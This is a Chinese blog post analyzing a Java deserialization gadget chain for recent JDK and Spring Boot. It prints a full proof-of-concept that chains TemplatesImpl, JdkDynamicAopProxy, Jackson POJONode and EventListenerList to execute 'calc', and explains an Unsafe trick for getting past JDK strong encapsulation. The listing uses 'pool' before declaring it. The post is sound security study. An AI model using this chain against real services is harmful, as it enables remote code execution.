<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="referrer" content="no-referrer">
<title>高版本JDK+SpringBoot原生反序列化通杀链 | Zephyr</title>
<link rel="icon" type="image/svg+xml" href="/images/favicon.svg">
<link rel="stylesheet" href="/css/style.css">
<meta name="generator" content="Hexo 8.1.2"></head>
<body>

<canvas id="particles"></canvas>
<div class="progress-bar" id="progressBar"></div>


<nav class="top-nav" id="topNav">
  <div class="nav-left">
    <a href="/" class="nav-brand">Zephyr</a>
    <a href="https://github.com/Zephyr1ng" class="nav-github" target="_blank" rel="noopener">
      <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0C5.37 0 0 5.37 0 12c0 5.31 3.435 9.795 8.205 11.385.6.105.825-.255.825-.57 0-.285-.015-1.23-.015-2.235-3.015.555-3.795-.735-4.035-1.41-.135-.345-.72-1.41-1.23-1.695-.42-.225-1.02-.78-.015-.795.945-.015 1.62.87 1.845 1.23 1.08 1.815 2.805 1.305 3.495.99.105-.78.42-1.305.765-1.605-2.67-.3-5.46-1.335-5.46-5.925 0-1.305.465-2.385 1.23-3.225-.12-.3-.54-1.53.12-3.18 0 0 1.005-.315 3.3 1.23.96-.27 1.98-.405 3-.405s2.04.135 3 .405c2.295-1.56 3.3-1.23 3.3-1.23.66 1.65.24 2.88.12 3.18.765.84 1.23 1.905 1.23 3.225 0 4.605-2.805 5.625-5.475 5.925.435.375.81 1.095.81 2.22 0 1.605-.015 2.895-.015 3.3 0 .315.225.69.825.57A12.02 12.02 0 0024 12c0-6.63-5.37-12-12-12z"/></svg>
      GitHub
    </a>
  </div>
  <ul class="nav-links">
    
      <li><a href="/">文章</a></li>
    
      <li><a href="/categories">分类</a></li>
    
      <li><a href="/friends">友链</a></li>
    
      <li><a href="/about">关于</a></li>
    
  </ul>
</nav>

<div class="container">
  <!-- Single post page -->
<article class="post-full">
  <header class="post-header">
    <a href="/" class="back-link">← Home</a>
    <h1 class="post-title">高版本JDK+SpringBoot原生反序列化通杀链</h1>
    <div class="post-meta">
      <time datetime="2025-08-26">2025-08-26</time>
      
    </div>
  </header>

  <div class="post-content">
    <h1 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h1><p>那天一个朋友忽然在群里给我发了一个.txt.exe文件，说告诉我是spring+jdk高版本通杀链，em我第一时间就是直接怼了回去</p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826181847672-1969003997.png" alt="image"></p>
<p>事实证明他还真是，他让我翻p神星球里的内容，我一看还真有师傅发了一个文章……没办法了，来分析一下大佬的新链子</p>
<h1 id="0x01-分析"><a href="#0x01-分析" class="headerlink" title="0x01 分析"></a>0x01 分析</h1><p>因为我没有在另一个星球里并且我自己也是个小菜鸡，所以这篇文章就围绕N1ght师傅的payload进行一个分析</p>
<p>其实乍一看对于我这个学习还没多久的小cj来看还是有点难的，但是仔细看看其实发现里面有一些知识点都还是了解过的，只不过放在一块有点陌生了(bushi</p>
<p>贴payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line">package org.example;</span><br><span class="line"></span><br><span class="line">import org.example.ReflectTools;</span><br><span class="line">import org.example.SerialTools;</span><br><span class="line">import org.example.UnSafeTools;</span><br><span class="line">import javassist.ClassPool;</span><br><span class="line">import sun.misc.Unsafe;</span><br><span class="line">import javassist.CtClass;</span><br><span class="line">import javassist.CtMethod;</span><br><span class="line">import javassist.CtNewConstructor;</span><br><span class="line">import javax.swing.event.EventListenerList;</span><br><span class="line">import javax.swing.undo.CompoundEdit;</span><br><span class="line">import javax.swing.undo.UndoManager;</span><br><span class="line">import javax.xml.transform.Templates;</span><br><span class="line">import java.lang.reflect.*;</span><br><span class="line">import java.util.Vector;</span><br><span class="line">// --add-opens java.base/java.lang=ALL-UNNAMED</span><br><span class="line">public class Main &#123;</span><br><span class="line">    public static void main(String[] args) throws Exception &#123;</span><br><span class="line"></span><br><span class="line">        //第一步构造恶意类和创建TemplatesImpl实例并赋值特定字段</span><br><span class="line">        //生成恶意类calc</span><br><span class="line">        CtClass ctClass = pool.makeClass(&quot;Calc&quot;);</span><br><span class="line">        ctClass.addConstructor(CtNewConstructor.make(&quot;public Calc() &#123; Runtime.getRuntime().exec(\&quot;calc\&quot;); &#125;&quot;, ctClass));</span><br><span class="line">        //生成一个类foo</span><br><span class="line">        CtClass ctClass1 = pool.makeClass(&quot;Foo&quot;);</span><br><span class="line">        //获取两个类的字节码</span><br><span class="line">        byte[] bytecode = ctClass.toBytecode();</span><br><span class="line">        byte[] bytecode1 = ctClass1.toBytecode();</span><br><span class="line">        //构造templateimpl实例</span><br><span class="line">        Class&lt;?&gt; aClass = Class.forName(&quot;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&quot;);</span><br><span class="line">        //通过反射创建对象，不调用其构造函数</span><br><span class="line">        Object templates = ReflectTools.createWithoutConstructor(aClass);</span><br><span class="line">        //设置TemplatesImpl的_name,_sdom,_tfactory,_bytecodes(包含恶意类calc和foo的字节码)字段</span><br><span class="line">        UnSafeTools.setObject(templates, aClass.getDeclaredField(&quot;_name&quot;), &quot;n1ght&quot;);</span><br><span class="line">        UnSafeTools.setObject(templates, aClass.getDeclaredField(&quot;_sdom&quot;), new ThreadLocal());</span><br><span class="line">        UnSafeTools.setObject(templates, aClass.getDeclaredField(&quot;_tfactory&quot;), UnSafeTools.newClass(Class.forName(&quot;com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl&quot;)));</span><br><span class="line">        UnSafeTools.setObject(templates, aClass.getDeclaredField(&quot;_bytecodes&quot;), new byte[][] &#123;bytecode, bytecode1&#125;);</span><br><span class="line">        // UnSafeTools.setObject(templates,aClass.getDeclaredField(&quot;_bytecodes&quot;), new byte[][]&#123;TomcatEcho.testCalc()&#125;);</span><br><span class="line"></span><br><span class="line">        //第二步：使用JdkDynamicAopProxy代理去使得jackson能够稳定获得特定的getter方法</span><br><span class="line">        //创建spring aop代理==&gt;这里创建了一个JdkDynamicAopProxy代理，该代理实现了Templates接口，并将TemplatesImpl实例作为目标。当代理对象的方法被调用时，会经过JdkDynamicAopProxy的invoke方法，最终调用到TemplatesImpl的方法。</span><br><span class="line">        Class&lt;?&gt; jdkDynamicAopProxy = Class.forName(&quot;org.springframework.aop.framework.JdkDynamicAopProxy&quot;);</span><br><span class="line">        Class&lt;?&gt; advisedSupport = Class.forName(&quot;org.springframework.aop.framework.AdvisedSupport&quot;);</span><br><span class="line">        Constructor&lt;?&gt; constructor = jdkDynamicAopProxy.getConstructor(advisedSupport);</span><br><span class="line">        constructor.setAccessible(true);</span><br><span class="line">        Object advisedSupport1 = advisedSupport.newInstance();</span><br><span class="line">        Method setTarget = advisedSupport1.getClass().getMethod(&quot;setTarget&quot;, Object.class);</span><br><span class="line">        setTarget.invoke(advisedSupport1, templates); // 将TemplatesImpl实例设置为目标</span><br><span class="line">        InvocationHandler invocationHandler = (InvocationHandler)constructor.newInstance(advisedSupport1);</span><br><span class="line">        Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]&#123;Templates.class&#125;, invocationHandler);</span><br><span class="line">        //第三步：jackson反序列化</span><br><span class="line">        //创建POJONode</span><br><span class="line">        Class&lt;?&gt; name = Class.forName(&quot;com.fasterxml.jackson.databind.node.POJONode&quot;);</span><br><span class="line">        Constructor&lt;?&gt; constructor1 = name.getConstructor(Object.class);</span><br><span class="line">        Object node = constructor1.newInstance(proxy);</span><br><span class="line">        //修改BaseJsonNode类，移除writeReplace方法，让反序列化走正常渠道，不走BaseJsonNode类的反序列化</span><br><span class="line">        ClassPool pool = ClassPool.getDefault();</span><br><span class="line">        CtClass ctClass3= pool.get(&quot;com.fasterxml.jackson.databind.node.BaseJsonNode&quot;);</span><br><span class="line">        CtMethod writeReplace = ctClass3.getDeclaredMethod(&quot;writeReplace&quot;);</span><br><span class="line">        ctClass3.removeMethod(writeReplace);</span><br><span class="line">        ctClass3.toClass();</span><br><span class="line">        //第四步：EventListenerList#readObject触发POJONode#toString实现任意调用getter方法</span><br><span class="line">        //构造EventListenerList和UndoManager</span><br><span class="line">        EventListenerList list2 = new EventListenerList();</span><br><span class="line">        UndoManager manager = new UndoManager();</span><br><span class="line">        Vector vector = (Vector) UnSafeTools.getObject(manager, CompoundEdit.class.getDeclaredField(&quot;edits&quot;));</span><br><span class="line">        vector.add(node);</span><br><span class="line">        //将EventListenerList的listenerList字段设置为一个数组</span><br><span class="line">        UnSafeTools.setObject(list2,EventListenerList.class.getDeclaredField(&quot;listenerList&quot;), new Object[]&#123;InternalError.class, manager&#125;);</span><br><span class="line">        // proxy.toString();</span><br><span class="line"></span><br><span class="line">        //序列化和反序列化</span><br><span class="line">        String s = SerialTools.base64Serial(list2);</span><br><span class="line">        System.out.println(s);</span><br><span class="line">        Object o = SerialTools.base64DeSerial(s);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这条链子中首先主要依赖的还是TemplatesImpl类，中间用到了 jackson反序列化和 利用 Unsafe 篡改 Module 机制，从而绕过 JDK 的强封装 以及一些tricks</p>
<h2 id="第一步：构造恶意类和创建TemplatesImpl实例并赋值特定字段"><a href="#第一步：构造恶意类和创建TemplatesImpl实例并赋值特定字段" class="headerlink" title="第一步：构造恶意类和创建TemplatesImpl实例并赋值特定字段"></a>第一步：构造恶意类和创建TemplatesImpl实例并赋值特定字段</h2><p>我就不讲了，就是TemplatesImpl利用常规的一些东西</p>
<h2 id="第二步：使用JdkDynamicAopProxy代理去使得jackson能够稳定获得特定的getter方法"><a href="#第二步：使用JdkDynamicAopProxy代理去使得jackson能够稳定获得特定的getter方法" class="headerlink" title="第二步：使用JdkDynamicAopProxy代理去使得jackson能够稳定获得特定的getter方法"></a>第二步：使用JdkDynamicAopProxy代理去使得jackson能够稳定获得特定的getter方法</h2><p><strong>看这个之前建议先看第三步</strong></p>
<p>JdkDynamicAopProxy是spring boot自带的一个代理工具类</p>
<p>那为什么要使用JdkDynamicAopProxy代理去可以稳定获得getter方法呢？</p>
<p>参考文章：<a target="_blank" rel="noopener" href="https://research.qianxin.com/archives/2414">https://research.qianxin.com/archives/2414</a>中的3.2 JNDI 注入的 Spring 环境利用</p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826181943756-2138091101.png" alt="image"></p>
<p>使用JdkDynamicAopProxy进行一个封装之后就可以是jackson稳定获得特定的getter</p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826181913324-1976604216.png" alt="image"></p>
<p>简单理解可以认为就是使用该代理并配置Template接口后，他只会去获取该接口中的getter方法，而不包括你要封装的对象的其它一堆getter方法</p>
<p>Template接口：</p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826181952155-130887696.png" alt="image"></p>
<p>TemplatesImpl类：</p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826181958044-578118340.png" alt="image"></p>
<h2 id="第三步：jackson反序列化"><a href="#第三步：jackson反序列化" class="headerlink" title="第三步：jackson反序列化"></a>第三步：jackson反序列化</h2><p>jackson反序列化参考文章：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/F12-blog/p/18129942">https://www.cnblogs.com/F12-blog/p/18129942</a>（TemplatesImpl链）</p>
<blockquote>
<p>其中涉及到一些操作的原因比如为什么要重写BaseJsonNode类并注释writeReplace方法：</p>
<p>当你尝试将精心构造的、内部包裹了TemplatesImpl的POJONode对象序列化成JSON（这是生成攻击载荷的必要步骤）时，Jackson会触发BaseJsonNode.writeReplace()方法。这个方法会尝试将POJONode“净化”为一个与原始对象结构完全不同的NodeSerialization对象。当你再反序列化这个JSON时，你得到的只是一个普通的、无害的JSON节点，而不是那个精心构造的、包裹着TemplatesImpl的POJONode。整个利用链在序列化生成Payload的阶段就被“断掉”了</p>
</blockquote>
<p>jackson反序列化主要是利用 POJONode#toString可以调用任意getter方法来实现的rce(也就是TemplatesImpl)</p>
<p>然后就是去找谁调用了 POJONode#toString，在低版本中是可以通过 BadAttributeValueExpException 的readobject去触发tostring，但是在高版本里，就没有触发的 toString 的了</p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826182014128-37200046.png" alt="image"></p>
<h2 id="第四步：EventListenerList-readObject触发POJONode-toString实现任意调用getter方法"><a href="#第四步：EventListenerList-readObject触发POJONode-toString实现任意调用getter方法" class="headerlink" title="第四步：EventListenerList#readObject触发POJONode#toString实现任意调用getter方法"></a>第四步：EventListenerList#readObject触发POJONode#toString实现任意调用getter方法</h2><p>因为上面提到了jdk高版本无法通过BadAttributeValueExpException去触发</p>
<p>payload中用到了一个使用EventListenerList触发任意toString</p>
<p><a target="_blank" rel="noopener" href="https://infernity.top/2025/03/24/EventListenerList%E8%A7%A6%E5%8F%91%E4%BB%BB%E6%84%8FtoString/">https://infernity.top/2025/03/24/EventListenerList%E8%A7%A6%E5%8F%91%E4%BB%BB%E6%84%8FtoString/</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">EventListenerList.readObject()</span><br><span class="line">    -&gt; EventListenerList.add(Class t, EventListener l)</span><br><span class="line">        -&gt; (隐式 toString) UndoManager.toString()</span><br><span class="line">            -&gt; CompoundEdit.toString()</span><br><span class="line">                -&gt; (隐式 toString) Vector.toString() / AbstractCollection.toString()</span><br><span class="line">                    -&gt; Iterator.next()</span><br><span class="line">                    -&gt; StringBuilder.append(Object obj)</span><br><span class="line">                        -&gt; String.valueOf(Object obj)</span><br><span class="line">                            -&gt; 恶意对象.toString() // 最终触发点</span><br></pre></td></tr></table></figure>

<p>说实话这个trick还真是第一次了解，又涨脑子了</p>
<h2 id="Trick1：绕过强封装"><a href="#Trick1：绕过强封装" class="headerlink" title="Trick1：绕过强封装"></a>Trick1：绕过强封装</h2><p>我们可以看到N1ght师傅的payload中使用了UnSafeTools和ReflectTools去操作那些反射的类并且赋值，这是因为在jdk高版本之后使用了一种叫强封装的机制：</p>
<p>默认情况下锁定内部 API 但允许您为特定用例解锁特定 API 的机制</p>
<p>这意味着使用反射访问JDK内部API的代码将不再被允许，任何对java.*代码中的非公共字段和方法进行反射将抛出<strong>InaccessibleObjectException</strong>异常</p>
<p>那有哪些是内部api呢？</p>
<p>参考官方文档：<a target="_blank" rel="noopener" href="https://dev.java-lang.cn/learn/modules/strong-encapsulation/">https://dev.java-lang.cn/learn/modules/strong-encapsulation/</a></p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826182031888-1923685041.png" alt="image"></p>
<p>在这里面我们可以看到虽然sun.*包被限制了，但是<code>sun.misc</code>和<code>sun.reflect</code>并没有被限制，仍可供所有JDK版本（包括JDK17）中的工具和库进行反射</p>
<p>而在sun.misc包下就有着Unsafe类。那么该如何利用Unsafe来打破JDK17及以上的强封装module限制呢？</p>
<p>参考文章：<a target="_blank" rel="noopener" href="https://h3rmesk1t.github.io/2024/10/23/Unsafe%E7%BB%95%E8%BF%87%E9%AB%98%E7%89%88%E6%9C%ACJDK%E5%8F%8D%E5%B0%84%E9%99%90%E5%88%B6/">https://h3rmesk1t.github.io/2024/10/23/Unsafe%E7%BB%95%E8%BF%87%E9%AB%98%E7%89%88%E6%9C%ACJDK%E5%8F%8D%E5%B0%84%E9%99%90%E5%88%B6/</a></p>
<p>讲的很好，我就不多赘述了</p>
<h2 id="Trick2："><a href="#Trick2：" class="headerlink" title="Trick2："></a>Trick2：</h2><p>在上面的分析中，我们使用 JdkDynamicAopProxy 对templates对象进行封装并配置，除了可以稳定获取getter方法之外，还有就是可以绕过这个强封装模块化</p>
<p>因为templates对象是在com.sun.*包下，是输入官方文档中的内部api</p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826182041650-1603779123.png" alt="image"></p>
<p>而Templates接口是在javax.xml包下，是不属于内部api的范围，也就绕过了这个机制</p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826182048103-815538568.png" alt="image"></p>
<h1 id="0x03-总结"><a href="#0x03-总结" class="headerlink" title="0x03 总结"></a>0x03 总结</h1><p>这篇文章主要就是简单分析一下N1ght师傅的payload，可能其中有一些理解上的错误，希望可以指正一下</p>
<p><img src="https://img2024.cnblogs.com/blog/3551469/202508/3551469-20250826182053346-348834921.png" alt="image"></p>

  </div>

  
  <nav class="post-nav">
    
      <a href="/2025/11/01/%E9%9D%A2%E7%BB%8F%E6%80%BB%E7%BB%93/" class="prev">← 面经总结！</a>
    
    
      <a href="/2025/08/25/smartbi%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-QVD-2025-31926/" class="next">smartbi远程代码执行漏洞复现(QVD-2025-31926) →</a>
    
  </nav>
  
</article>

</div>

<script src="/js/main.js"></script>
</body>
</html>
